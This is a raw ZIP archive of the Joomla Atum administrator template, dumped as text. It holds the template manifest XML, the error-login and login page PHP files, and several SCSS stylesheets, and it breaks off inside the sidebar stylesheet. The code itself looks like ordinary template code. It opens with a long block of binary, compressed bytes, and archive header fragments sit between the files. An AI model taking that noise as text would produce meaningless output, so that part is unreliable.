�U[�m֠ۘe 2h3r�"A,��9�cJ��i|D��qf��F� �nѳ��]�L���0|�lf�-.Ϻ�f�L��z'-���mک���"���U��^�5��m�0�5<ȶ����~8ڴ�<�xƽ��,�:����]R��'=�<,��6zѪ�}�n+��[�E���V�*���پ�<�Ä%p��miX�B/lrj�}6��u]��7�Nu��hخ���Ժ�ö��mz}���'�Wx-Ծ#���NNet�� Kp̪e�x����.��#3���gb&�����+6i�pY9�W/.�F�Q��LJ
�*;�p���6I�U/c���g$4
�x��3�A���ґS@����C��Y�\r=*d�0����{�<�Xi1�_x��ޡ:���4+�0�3���l�d;;�_��X���;i�n�_���4{Y�T���05"�ƎI;H_��+{a�O3L��0�[̼#{����	��qMߛ��5�7\���2[�|G1��kЀ�]2�f�I���U��d��/��¤�����A|�a��#�>6�p��cҜW�cL(u�Y���ڎ���ӛcl��=����a��]�t[�_9Pu3Z*�y�L2�3��*̷�p�(�oO����=M�	�^��e�ƛ���G:၍
���r1��M�3Z.�E<���l�.��8�Z`(���C6~es&�V{sNy+�����x�l�NK�m曖���q��,7Y_�eS�w*3�̯+G׬�5"c��� �:^Dž���&0Z�U��E���>ׅ%(NDD?�7��‰kvx㘢?m��ud�����2���6��8�L�ǡܮ�Ƙ��8��ciz�2�Of�{��p[�
W0����X����1��	��0o�!S�z��7ai$�����N0��,#pm�<Gn��Þ��m�P����>���O�S�U�E�.�6�)��1�lߪ�����8�����y�,��s{�Ǝ�.o�:E:v`o�hvrV�������m�pm�d6Vd�*����A��wxK	���� ,a`99CX駜�j��(�*�~�=�R$~:�tj����$�m.�2%��F�Ò))���o4����
��˵Y��is�姜p�L|&:�T�Nۮ`�eՙ�lpw{�pq��d$6-���|.���̦�ñ>�(j�H�h���̳�t�FL���GDk�5.-�p�
�x=�A�@��������5T�
Z2�S��6:cR���G�,6�ҟT�B�=*,�t�$8 �g��,�7�}"4ڒ���ӄAS/`��8��a�W���\�a%���=U!����P�p\�S�]G���M�E:��J����=[k�����O8�Xo�O�~����LK��@+�f]>X#�2�tcG���4��
�ɠx���A��ClK�#�VwOC�����us��߽	K�&Ŋ����4���:���]
"`d�*Ν�Y��~u�:�	��!5���J�47�V��Өo������6�|�0��S�͸�����R�ڎ��@ ���jt
@�m�T�P�J�d	�Rs�F~_�L�������H�ٖ�z�bL6�����A,B��1�m��'N5@��n�j����.��r
�ꝷ�g�[m�آE��N��N�1�`Ğ)J[Vb���b����j]͖�r�]S�}tm3.�e3�AXʑ��A���y{rYۊK����"�7;�VA4��"�8���ȑlj�Y�%������Ge~Q8���*O��V�ch�)֠�=;�t�׷0y��^�m�M.�MmF_�&�"��%3,�1�d1ͳA���D��,�hٝW���-�ˊYU���2�ڹ�'"[@�*�ۣE�p�FK��;��Ix�'FK�ˆIHg�B�`�Qk�G�kL�8�*��.�d��Xn#6z��CL�%�g��oO	��m�a�Qi��rגK=�I�e6���:Ӽ�&A/S��~��� (�A�N3�s����~{���:r��KI�q��:xü�v��2���u���'>o��&m���&|��̄K���1�>|�"ņ=�e��t[��r٨����F[n�B��Xn �f�~���1��
�ᗋ��=��i0����8Ʊ7ł��c̭��!eڌW�0�Q�	=���0�~Wd��B�k�lž�Rn.���h�̑��S;N8��|چ��X�9t�"����6���U���x�	7�kM�MUm�[�;}~V�b#�����)E����\"_v���>�S:Q���b_��v�6�o�i�r�Nrv�N	�av8�lZ��Y3d'6mdu![��,���1{u�[8�.m�g	��L~`��o��t��lھ;{<䬙M�7�iZ��ۋ����tCQ`Fյ;���ۜ��x#�����c�����*�~�%�
*P��f�S�a��㐷�ڐ���6oZ.�߲y���ň6	���y��q�Ow?Ma�;�\��(-��6ߝW8o��+���z�N���-�w��Y��_P��[P�蛯���f�
��=�B�m��=	�Wܥ�S���n�
"[kN;��񂄝8�d����4�%e���g�U�]l�w�#5e?K�Ӟ�d"�Uz}G�)�W3�8�B����,��x@����J8@�I��Y>��g�PR?��/���Wk;�N�v���Q�γ�u��H1��+3�3k؄A��K��)ke���Mz:�E��^��?��0�,��)��$\z�S9awjc=Ə�3��&�5�i��I�J�t
�u߽���c�����VP\j]c6+k>D[4�1���c�N���F6�"��Ŭ��13��ps���em��ݎߨ��ns‹�V�?j�֡��V-�8z��f*{�l��ٶ�5㣶n]����=�-�l����j�����-i��!h��d��ًF�ѥIPK!�+����atum/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<extension type="template" client="administrator">
	<name>atum</name>
	<version>1.0</version>
	<creationDate>September 2016</creationDate>
	<author>Joomla! Project</author>
	<authorEmail>admin@joomla.org</authorEmail>
	<copyright>(C) 2016 Open Source Matters, Inc.</copyright>
	<description>TPL_ATUM_XML_DESCRIPTION</description>
	<files>
		<filename>component.php</filename>
		<filename>cpanel.php</filename>
		<filename>error.php</filename>
		<filename>error_full.php</filename>
		<filename>error_login.php</filename>
		<filename>index.php</filename>
		<filename>joomla.asset.json</filename>
		<filename>login.php</filename>
		<filename>templateDetails.xml</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<folder>css</folder>
		<folder>html</folder>
		<folder>images</folder>
		<folder>Service</folder>
		<folder>scss</folder>
	</files>
	<media destination="templates/atum" folder="media">
		<folder>js</folder>
	</media>
	<positions>
		<!-- used directly in the template -->
		<position>bottom</position>
		<position>debug</position>
		<position>menu</position>
		<position>sidebar</position>
		<position>status</position>
		<position>title</position>
		<position>top</position>
		<position>toolbar</position>
		<!-- used directly in a component and included here so the position will appear in the list of available positions -->
		<position>cpanel</position>
		<position>icon</position>
		<position>login</position>
		<position>customtop</position>
	</positions>
	<languages folder="language">
		<language tag="en-GB">en-GB/tpl_atum.ini</language>
		<language tag="en-GB">en-GB/tpl_atum.sys.ini</language>
	</languages>
	<config>
		<fields name="params">
			<fieldset name="colors" label="TPL_ATUM_COLORS_SETTINGS_LABEL">
				<field
					name="hue"
					type="color"
					label="TPL_ATUM_COLORS_HUE"
					format="hue"
					control="slider"
					preview="true"
					saveFormat="hsl"
					default="hsl(214,63%,20%)"
				/>
				<field
					name="bg-light"
					type="color"
					label="TPL_ATUM_COLORS_SETTINGS_BG_LIGHT_LABEL"
					default="#f0f4fb"
					filter="color"
				/>
				<field
					name="text-dark"
					type="color"
					label="TPL_ATUM_COLORS_SETTINGS_TEXT_DARK_LABEL"
					default="#495057"
					filter="color"
				/>
				<field
					name="text-light"
					type="color"
					label="TPL_ATUM_COLORS_SETTINGS_TEXT_LIGHT_LABEL"
					default="#ffffff"
					filter="color"
				/>
				<field
					name="link-color"
					type="color"
					label="TPL_ATUM_COLORS_SETTINGS_LINK_COLOR_LABEL"
					default="#2a69b8"
					filter="color"
				/>
				<field
					name="special-color"
					type="color"
					label="TPL_ATUM_COLORS_SETTINGS_SPECIAL_COLOR_LABEL"
					default="#001B4C"
					filter="color"
				/>
				<field
					name="monochrome"
					type="radio"
					label="TPL_ATUM_COLORS_SETTINGS_MONOCHROME_LABEL"
					layout="joomla.form.field.radio.switcher"
					default="0"
					>
					<option value="0">JNO</option>
					<option value="1">JYES</option>
				</field>
			</fieldset>

			<fieldset name="images" label="TPL_ATUM_IMAGE_SETTINGS_LABEL">
				<fieldset name="loginLogo" label="TPL_ATUM_LOGIN_LOGO_LABEL">
					<field
						name="loginLogo"
						type="media"
						label="TPL_ATUM_IMAGE_LABEL"
					/>
					<field
						name="loginLogoAlt"
						type="text"
						label="TPL_ATUM_LOGO_ALT_LABEL"
					/>
					<field
						name="emptyLoginLogoAlt"
						type="checkbox"
						label="TPL_ATUM_LOGO_ALT_EMPTY_LABEL"
						description="TPL_ATUM_LOGO_ALT_EMPTY_DESC"
					/>
				</fieldset>
				<fieldset name="logoBrandLarge" label="TPL_ATUM_SITE_LOGO_LABEL">
					<field
						name="logoBrandLarge"
						type="media"
						label="TPL_ATUM_IMAGE_LABEL"
					/>
					<field
						name="logoBrandLargeAlt"
						type="text"
						label="TPL_ATUM_LOGO_ALT_LABEL"
					/>
					<field
						name="emptyLogoBrandLargeAlt"
						type="checkbox"
						label="TPL_ATUM_LOGO_ALT_EMPTY_LABEL"
						description="TPL_ATUM_LOGO_ALT_EMPTY_DESC"
					/>
				</fieldset>
				<fieldset name="logoBrandSmall" label="TPL_ATUM_SITE_LOGO_SMALL_LABEL">
					<field
						name="logoBrandSmall"
						type="media"
						label="TPL_ATUM_IMAGE_LABEL"
					/>
					<field
						name="logoBrandSmallAlt"
						type="text"
						label="TPL_ATUM_LOGO_ALT_LABEL"
					/>
					<field
						name="emptyLogoBrandSmallAlt"
						type="checkbox"
						label="TPL_ATUM_LOGO_ALT_EMPTY_LABEL"
						description="TPL_ATUM_LOGO_ALT_EMPTY_DESC"
					/>
				</fieldset>
			</fieldset>
		</fields>
	</config>
</extension>
PK!w�aA__atum/error_login.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 * @copyright   (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       4.0.0
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;
use Joomla\CMS\Uri\Uri;

/** @var \Joomla\CMS\Document\ErrorDocument $this */

$app   = Factory::getApplication();
$input = $app->input;
$wa    = $this->getWebAssetManager();

// Detecting Active Variables
$option = $input->get('option', '');
$view   = $input->get('view', '');
$layout = $input->get('layout', 'default');
$task   = $input->get('task', 'display');

// Browsers support SVG favicons
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon.svg', '', [], true, 1), 'icon', 'rel', ['type' => 'image/svg+xml']);
$this->addHeadLink(HTMLHelper::_('image', 'favicon.ico', '', [], true, 1), 'alternate icon', 'rel', ['type' => 'image/vnd.microsoft.icon']);
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon-pinned.svg', '', [], true, 1), 'mask-icon', 'rel', ['color' => '#000']);

// Template params
$logoBrandLarge  = $this->params->get('logoBrandLarge')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandLarge'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-large.svg';
$loginLogo = $this->params->get('loginLogo')
	? Uri::root() . $this->params->get('loginLogo')
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/login.svg';
$logoBrandSmall = $this->params->get('logoBrandSmall')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandSmall'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-small.svg';

$logoBrandLargeAlt = empty($this->params->get('logoBrandLargeAlt')) && empty($this->params->get('emptyLogoBrandLargeAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandLargeAlt'), ENT_COMPAT, 'UTF-8') . '"';
$logoBrandSmallAlt = empty($this->params->get('logoBrandSmallAlt')) && empty($this->params->get('emptyLogoBrandSmallAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandSmallAlt'), ENT_COMPAT, 'UTF-8') . '"';
$loginLogoAlt = empty($this->params->get('loginLogoAlt')) && empty($this->params->get('emptyLoginLogoAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('loginLogoAlt'), ENT_COMPAT, 'UTF-8') . '"';

	// Get the hue value
preg_match('#^hsla?\(([0-9]+)[\D]+([0-9]+)[\D]+([0-9]+)[\D]+([0-9](?:.\d+)?)?\)$#i', $this->params->get('hue', 'hsl(214, 63%, 20%)'), $matches);

// Enable assets
$wa->usePreset('template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr'))
	->useStyle('template.active.language')
	->useStyle('template.user')
	->addInlineStyle(':root {
		--hue: ' . $matches[1] . ';
		--template-bg-light: ' . $this->params->get('bg-light', '#f0f4fb') . ';
		--template-text-dark: ' . $this->params->get('text-dark', '#495057') . ';
		--template-text-light: ' . $this->params->get('text-light', '#ffffff') . ';
		--template-link-color: ' . $this->params->get('link-color', '#2a69b8') . ';
		--template-special-color: ' . $this->params->get('special-color', '#001B4C') . ';
	}');

// Override 'template.active' asset to set correct ltr/rtl dependency
$wa->registerStyle('template.active', '', [], [], ['template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr')]);

// Set some meta data
$this->setMetaData('viewport', 'width=device-width, initial-scale=1');

$monochrome = (bool) $this->params->get('monochrome');

// @see administrator/templates/atum/html/layouts/status.php
$statusModules = LayoutHelper::render('status', ['modules' => 'status']);
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>

<body class="admin <?php echo $option . ' view-' . $view . ' layout-' . $layout . ($task ? ' task-' . $task : '') . ($monochrome ? ' monochrome' : ''); ?>">

	<noscript>
		<div class="alert alert-danger" role="alert">
			<?php echo Text::_('JGLOBAL_WARNJAVASCRIPT'); ?>
		</div>
	</noscript>

	<header id="header" class="header d-flex">
		<div class="header-title d-flex">
			<div class="d-flex align-items-center">
				<div class="logo">
					<img src="<?php echo $logoBrandLarge; ?>" <?php echo $logoBrandLargeAlt; ?>>
					<img class="logo-collapsed" src="<?php echo $logoBrandSmall; ?>" <?php echo $logoBrandSmallAlt; ?>>
				</div>
			</div>
			<jdoc:include type="modules" name="title" />
		</div>
		<?php echo $statusModules; ?>
	</header>

	<div id="wrapper" class="d-flex wrapper">
		<div class="container-fluid container-main">
			<section id="content" class="content h-100">
				<main class="d-flex justify-content-center align-items-center h-100">
					<div id="element-box" class="card">
						<div class="card-body">
							<div class="main-brand d-flex align-items-center justify-content-center">
								<img src="<?php echo $loginLogo; ?>" <?php echo $loginLogoAlt; ?>>
							</div>
							<h1><?php echo Text::_('JERROR_AN_ERROR_HAS_OCCURRED'); ?></h1>
							<jdoc:include type="message" />
							<blockquote class="blockquote">
								<span class="badge bg-secondary"><?php echo $this->error->getCode(); ?></span>
								<?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
							</blockquote>
							<?php if ($this->debug) : ?>
								<div>
									<?php echo $this->renderBacktrace(); ?>
									<?php // Check if there are more Exceptions and render their data as well ?>
									<?php if ($this->error->getPrevious()) : ?>
										<?php $loop = true; ?>
										<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
										<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
										<?php $this->setError($this->_error->getPrevious()); ?>
										<?php while ($loop === true) : ?>
											<p><strong><?php echo Text::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
											<p><?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></p>
											<?php echo $this->renderBacktrace(); ?>
											<?php $loop = $this->setError($this->_error->getPrevious()); ?>
										<?php endwhile; ?>
										<?php // Reset the main error object to the base error ?>
										<?php $this->setError($this->error); ?>
									<?php endif; ?>
								</div>
							<?php endif; ?>
						</div>
					</div>
				</main>
			</section>
		</div>

		<div id="sidebar-wrapper" class="sidebar-wrapper">
			<div id="main-brand" class="main-brand">
				<h1><?php echo $app->get('sitename'); ?></h1>
				<a href="<?php echo Uri::root(); ?>"><?php echo Text::_('TPL_ATUM_LOGIN_SIDEBAR_VIEW_WEBSITE'); ?></a>
			</div>
			<div id="sidebar">
				<jdoc:include type="modules" name="sidebar" style="body" />
			</div>
		</div>
	</div>
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!��̼atum/login.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       4.0.0
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;
use Joomla\CMS\Uri\Uri;

/** @var \Joomla\CMS\Document\HtmlDocument $this */

$app   = Factory::getApplication();
$input = $app->input;
$wa    = $this->getWebAssetManager();

// Detecting Active Variables
$option = $input->get('option', '');
$view   = $input->get('view', '');
$layout = $input->get('layout', 'default');
$task   = $input->get('task', 'display');

// Browsers support SVG favicons
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon.svg', '', [], true, 1), 'icon', 'rel', ['type' => 'image/svg+xml']);
$this->addHeadLink(HTMLHelper::_('image', 'favicon.ico', '', [], true, 1), 'alternate icon', 'rel', ['type' => 'image/vnd.microsoft.icon']);
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon-pinned.svg', '', [], true, 1), 'mask-icon', 'rel', ['color' => '#000']);

// Template params
$logoBrandLarge  = $this->params->get('logoBrandLarge')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandLarge'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-large.svg';
$loginLogo = $this->params->get('loginLogo')
	? Uri::root() . $this->params->get('loginLogo')
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/login.svg';
$logoBrandSmall = $this->params->get('logoBrandSmall')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandSmall'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-small.svg';

$logoBrandLargeAlt = empty($this->params->get('logoBrandLargeAlt')) && empty($this->params->get('emptyLogoBrandLargeAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandLargeAlt'), ENT_COMPAT, 'UTF-8') . '"';
$logoBrandSmallAlt = empty($this->params->get('logoBrandSmallAlt')) && empty($this->params->get('emptyLogoBrandSmallAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandSmallAlt'), ENT_COMPAT, 'UTF-8') . '"';
$loginLogoAlt = empty($this->params->get('loginLogoAlt')) && empty($this->params->get('emptyLoginLogoAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('loginLogoAlt'), ENT_COMPAT, 'UTF-8') . '"';

// Get the hue value
preg_match('#^hsla?\(([0-9]+)[\D]+([0-9]+)[\D]+([0-9]+)[\D]+([0-9](?:.\d+)?)?\)$#i', $this->params->get('hue', 'hsl(214, 63%, 20%)'), $matches);

// Enable assets
$wa->usePreset('template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr'))
	->useStyle('template.active.language')
	->useStyle('template.user')
	->addInlineStyle(':root {
		--hue: ' . $matches[1] . ';
		--template-bg-light: ' . $this->params->get('bg-light', '#f0f4fb') . ';
		--template-text-dark: ' . $this->params->get('text-dark', '#495057') . ';
		--template-text-light: ' . $this->params->get('text-light', '#ffffff') . ';
		--template-link-color: ' . $this->params->get('link-color', '#2a69b8') . ';
		--template-special-color: ' . $this->params->get('special-color', '#001B4C') . ';
	}');

// Override 'template.active' asset to set correct ltr/rtl dependency
$wa->registerStyle('template.active', '', [], [], ['template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr')]);

// Set some meta data
$this->setMetaData('viewport', 'width=device-width, initial-scale=1');

$monochrome = (bool) $this->params->get('monochrome');

// Add cookie alert message
Text::script('JGLOBAL_WARNCOOKIES');

// @see administrator/templates/atum/html/layouts/status.php
$statusModules = LayoutHelper::render('status', ['modules' => 'status']);

HTMLHelper::_('bootstrap.dropdown');

?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>

<body class="admin <?php echo $option . ' view-' . $view . ' layout-' . $layout . ($task ? ' task-' . $task : '') . ($monochrome ? ' monochrome' : ''); ?>">

	<noscript>
		<div class="alert alert-danger" role="alert">
			<?php echo Text::_('JGLOBAL_WARNJAVASCRIPT'); ?>
		</div>
	</noscript>
	<div class="ie11 alert alert-warning" role="alert">
		<?php echo Text::_('JGLOBAL_WARNIE'); ?>
	</div>

	<header id="header" class="header d-flex">
		<div class="header-title d-flex">
			<div class="d-flex align-items-center">
				<div class="logo">
					<img src="<?php echo $logoBrandLarge; ?>" <?php echo $logoBrandLargeAlt; ?>>
					<img class="logo-collapsed" src="<?php echo $logoBrandSmall; ?>" <?php echo $logoBrandSmallAlt; ?>>
				</div>
			</div>
			<jdoc:include type="modules" name="title" />
		</div>
		<?php echo $statusModules; ?>
	</header>

	<div id="wrapper" class="wrapper">
		<div class="container-fluid container-main">
			<section id="content" class="content h-100">
				<div class="login_message">
					<jdoc:include type="message" />
				</div>
				<main class="d-flex justify-content-center align-items-center h-100">
					<div class="login">
						<div class="main-brand logo text-center">
							<img src="<?php echo $loginLogo; ?>" <?php echo $loginLogoAlt; ?>>
						</div>
						<jdoc:include type="component" />
					</div>
				</main>
			</section>
		</div>

		<div id="sidebar-wrapper" class="sidebar-wrapper px-3 pb-3">
			<div id="main-brand" class="main-brand">
				<h1><?php echo $app->get('sitename'); ?></h1>
				<h2><?php echo Text::_('TPL_ATUM_BACKEND_LOGIN'); ?></h2>
			</div>
			<div id="sidebar">
				<jdoc:include type="modules" name="sidebar" style="body" />
			</div>
		</div>
	</div>
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!gmIii atum/scss/pages/_com_cpanel.scssnu&1i�// com_cpanel

.cpanel-add-module-icon,
.com-cpanel {
  &-help,
  &-system {

    .list-group-item {
      padding: 0;

      a {
        display: block;
        padding: $list-group-item-padding-y $list-group-item-padding-x;
      }
    }
  }

  &-help {

    &__header {
      color: var(--template-special-color);
    }

    a {
      color: var(--template-link-color);
    }

    h2 {
      font-size: $h4-font-size;
    }

  }

  &-system {
    column-count: 4;

    &__category {
      margin-bottom: 1.5em;
      page-break-inside: avoid;
      break-inside: avoid;
    }

    &__header {
      color: var(--template-special-color);

      span {
        margin-right: 5px;
      }
    }

    a {
      color: var(--template-link-color);
    }

    h2 {
      font-size: $h4-font-size;
    }


    @include media-breakpoint-down(lg) {
      column-count: 2;
    }

    @include media-breakpoint-down(md) {
      column-count: 1;
    }
  }
}

.com_cpanel {

  .content {
    margin-top: 2rem;
  }

  .card {
    p:last-child {
      margin-bottom: 0;
    }

    .list-group,
    .table {
      padding: 0;
      margin-bottom: unset;
    }

  }

  .card-header {
    display: flex;
    align-items: center;
    padding: 1rem 1rem .75rem;
    font-weight: $font-weight-bold;
    color: var(--template-bg-dark);
    background: var(--card-bg);

    > [class^="icon-"],
    > img {
      margin-inline-end: .5rem;
    }

    .btn {
      margin-top: .25em;
      margin-bottom: .25em;
    }
  }

  .card-body {
    padding: 0;
    overflow: hidden;
    border-bottom-right-radius: $border-radius;
    border-bottom-left-radius: $border-radius;
  }

  .module-actions {
    order: 1;
    margin-inline-start: auto;

    > * {
      padding: 0;
      color: var(--template-bg-dark-70);
    }
  }

  .cpanel-add-module {
    display: flex;
    flex-direction: column;
    align-items: flex-start;
    justify-content: flex-end;
    width: 100%;
    min-height: 130px;
    padding: 0 1rem;
    font-size: .875rem;
    font-weight: 700;
    line-height: 1;
    color: hsl(var(--hue),30%,40%);
    background-color: hsl(var(--hue),35%,98%);
    border: 1px solid hsl(var(--hue),35%,88%);
    border-radius: $border-radius;
    transition: all .15s ease-in;

    &:hover,
    &:focus,
    &:active {
      color: #fff;
      text-decoration: none;
      background: var(--template-bg-dark);
    }

    > span {
      padding: .25rem 0 1rem;
    }

    .cpanel-add-module-icon {
      font-size: 2rem;
      color: hsl(var(--hue),30%,40%);
      margin-inline-end: .5rem;
    }
  }
}

.cpanel-modules {
  .list-group {
    border-top: 1px solid $list-group-border-color;
  }

  .list-group-item {
    &:hover {
      background: var(--toolbar-bg);
    }

    a {
      font-weight: 500;
      text-decoration: underline;
    }

    .btn {
      text-decoration: none;
    }

    .list-group-item a > span {
      &[class^="#{$jicon-css-prefix}-"],
      &[class*=" #{$jicon-css-prefix}-"],
      &[class^="#{$fa-css-prefix}-"],
      &[class*=" #{$fa-css-prefix}-"] {
        display: block;
        padding: .5rem;
        color: rgba(255, 255, 255, .9);
        background: var(--template-link-color);
        box-shadow: $atum-box-shadow;

        &:hover {
          background: var(--template-link-hover-color);
        }
      }
    }
  }

  .list-group-item span.home-image {
    &[class^="#{$jicon-css-prefix}-"],
    &[class*=" #{$jicon-css-prefix}-"],
    &[class^="#{$fa-css-prefix}-"],
    &[class*=" #{$fa-css-prefix}-"] {
      display: inline-block;
      padding: 0;
      margin: 0 .85rem;
      font-size: .9rem;
      color: rgba(1, 1, 1, 1);
      background: var(--white-offset);
      box-shadow: none;
      transform: scale(1.2);
    }
  }

  h2 {
    margin-bottom: 0;
    font-size: $h4-font-size;
  }

  .mod-custom {
    padding: 1rem;
  }
}

.sample-data {
  .list-group-item {
    padding: 1rem;
  }
}

.sample-data__title {
  font-weight: bold;
  color: var(--primary);
}

.sample-data__icon {
  width: 1.3rem;
  text-align: center;
}

.sample-data__desc {
  border-inline-start: 4px solid hsl(var(--hue),50%,93%);
  padding-inline-start: 1rem;
  margin-inline-start: 8px;
}
PK!)��EEatum/scss/pages/_com_users.scssnu&1i�// com_users

.com_users {

  &.view-debuggroup,
  &.view-debuguser {

    thead th {
      white-space: normal;
    }

    .legend {
      margin: 1rem 1rem 0;
    }
  }

  &.view-mail {

    .form-control {
      max-width: 100%;
    }
  }

  #fieldset-groups {
    .controls {
      margin-inline-start: 2rem;
    }
  }
}
PK!~�;;!atum/scss/pages/_com_modules.scssnu&1i�.new-modules {
  .card-columns {
    grid-template-columns: repeat(auto-fill, minmax(240px, 1fr));
  }
}

.new-module {
  display: flex;
  overflow: hidden;
  color: hsl(var(--hue),30%,40%);
  background-color: hsl(var(--hue), 60%, 97%);
  border: 1px solid hsl(var(--hue), 50%, 93%);
  border-radius: $border-radius;

  * {
    transition: all .25s ease;
  }

  &-details {
    flex: 1 0;
    padding: 1rem;
  }

  &-title {
    margin-bottom: .25rem;
    font-size: 1rem;
    font-weight: 700;
  }

  &-caption {
    display: box;
    margin: 0;
    overflow: hidden;
    font-size: .875rem;
    /* stylelint-disable property-no-unknown */
    box-orient: vertical;
    -webkit-line-clamp: 3;
  }

  &-link {
    display: flex;
    align-items: flex-end;
    justify-content: center;
    width: 2.5rem;
    font-size: 1.2rem;
    background: hsl(var(--hue), 50%, 93%);

    span {
      margin-bottom: 10px;
      color: hsl(var(--hue), 30%, 40%);
    }

    .new-module:hover & {
      background: var(--template-bg-dark);

      span {
        color: $white;
      }
    }
  }
}
PK!s���~~#atum/scss/pages/_com_templates.scssnu&1i�// com_templates
.com_templates {

  .menu-assignment {
    position: relative;

    .menu-links {
      padding-left: 0;
      margin-top: 15px;
      margin-left: 0;
      column-count: 3;
      column-gap: 15px;

      @include media-breakpoint-down(lg) {
        column-count: auto;
      }

      > li {
        display: inline-block;
        width: 100%;
        margin-bottom: 15px;
        vertical-align: top;
        list-style: none;
        backface-visibility: hidden;
        page-break-inside: avoid;
        break-inside: avoid;
      }
    }

    .menu-links-block {
      padding: 15px;
      background-color: var(--card-bg);
      border: 1px solid $border-color;
      border-radius: 3px;
    }

    label {
      display: block;
      padding: 3px 0;
      font-size: inherit;

      input {
        position: relative;
        margin-inline-end: 5px;
      }
    }
  }
}
PK!�*9��!atum/scss/pages/_com_privacy.scssnu&1i�// com-privacy

.tbody-icon {
  .#{$jicon-css-prefix}-download,
  .#{$fa-css-prefix}-download {
    color: var(--success);
    border-color: var(--success);
  }

  .#{$jicon-css-prefix}-mail,
  .#{$fa-css-prefix}-mail {
    color: var(--primary);
    border-color: var(--primary);
  }

  .#{$jicon-css-prefix}-delete,
  .#{$fa-css-prefix}-delete,
  .#{$jicon-css-prefix}-times,
  .#{$fa-css-prefix}-times {
    color: var(--danger);
    border-color: var(--danger);
  }
}
PK!��ԑ"" atum/scss/pages/_com_config.scssnu&1i�// com_config

.com_config {

  #fieldset-permissions {
    grid-template-columns: 1fr;
  }

  #page-filters .form-select {
    width: auto;
  }

  .tab-description {
    grid-column: 1 / -1;
  }

  .options-menu {
    .revert-controls .controls {
      margin-inline-start: 0;
    }
  }
}
PK!��ddatum/scss/pages/_com_tags.scssnu&1i�.com_tags {

  #fieldset-image-intro,
  #fieldset-image-fulltext {
    > div {
      grid-template-columns: 1fr;
    }

    @include media-breakpoint-up(md) {
      display: inline-block;
      width: calc(50% - 15px);
    }
  }

  #fieldset-image-intro {
    margin-inline-end: 15px;
  }

  #fieldset-image-fulltext {
    margin-inline-start: 15px;
  }
}
PK!�^!atum/scss/pages/_com_content.scssnu&1i�.com_content.layout-edit {
  joomla-field-media .field-media-preview {
    height: 10.25rem;
  }

  joomla-tab {

    #attrib-basic[active],
    #editor[active] {
      display: flex;
      flex-wrap: wrap;

      .form-group {
        flex: 0 0 50%;
        max-width: 50%;
        box-shadow: none;

        &:nth-child(1),
        &:nth-child(19) {
          flex: 0 0 100%;
          max-width: 100%;
        }
      }

      .field-spacer {
        flex: 0 0 100%;
        max-width: 100%;
      }
    }
  }
}
PK!%'iatum/scss/_mixin.scssnu&1i�// Mixins


PK!̋��iiatum/scss/blocks/_lists.scssnu&1i�#content {
  form {
    .name {
      &.break-word {
        word-break: break-word;
      }
    }
  }
}
PK!ﹽEEatum/scss/blocks/_iframe.scssnu&1i�// Iframe

iframe {
  border: 0;
}

.modal iframe {
  width: 100%;
}
PK!I���ttatum/scss/blocks/_sidebar.scssnu&1i�// Sidebar

.sidebar-wrapper {
  z-index: $zindex-sidebar;
  min-height: calc(100vh - 66px);
  overflow: hidden;
  background-color: var(--template-sidebar-bg);
  box-shadow: 0 0 20px -10px var(--template-bg-dark-50);
